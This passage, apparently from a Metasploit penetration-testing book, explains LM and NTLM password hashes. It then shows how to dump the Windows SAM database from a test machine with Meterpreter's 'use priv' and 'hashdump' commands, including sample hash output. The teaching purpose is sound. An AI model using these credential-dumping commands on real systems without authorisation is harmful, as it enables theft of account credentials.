background image

Meterpreter

83

a 7-character password instead of a 14-character one. In NTLM, regardless 
of the password size, 

password123456

 would be stored as a hash value of 

password123456

.

NOTE

We’re using a super complex password here that we would not be able to crack in a rea-
sonable amount of time. Our password is larger than the 14-character maximum that 
LM supports, so it has automatically converted itself to an NTLM-based hash value. 
Even with rainbow tables or a super powerful cracking machine, it would take a signif-
icant amount of time to crack these passwords.

In the following code, we extract a username and password hash for the 

Administrator

 user account with UID 500 (the Windows Administrator system 

default). The strings that follow 

Administrator:500

 are two hashes of the 

Administrator

 password. This shows an example of a simple extract of a user-

name and password hashes. Shortly, we will extract our own username and 
password hashes from our Windows XP system.

Administrator:500:e52cac67419a9a22cbb699e2fdfcc59e   :30ef086423f916deec378aac42c4ef0c  :::

The first hash at   is an LM hash, and the second at   is an NTLM hash.

Dumping the Password Hash

On your target machine, change your password to something complex, such 
as 

thisisacrazylongpassword&&!!@@##

 and use Meterpreter to dump the user-

name and password hashes (shown in the preceding code listing) from the 
target again. We will leverage the 

use priv

 command, which means we are 

running as a privileged user account.

To dump the Security Account Manager (SAM) database, we need to be 

running as SYSTEM to get around the registry restrictions and dump the pro-
tected SAM storage that contains our Windows usernames and passwords, as 
shown next. Try performing this scenario on a test virtual machine to see if 
you can dump the username and password hashes. In this listing, we execute 
the 

hashdump

 command, which dumps all the usernames and password hashes 

from the system.

meterpreter > 

use priv

Loading extension priv...success.
meterpreter > 

run post/windows/gather/hashdump

 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::

A hash value that starts with 

aad3b435

 is simply an empty or 

null hash value—a placeholder for an empty string. (Something like 

Administrator:500:NOPASSWD:ntlmhash

 is also null.) Because our password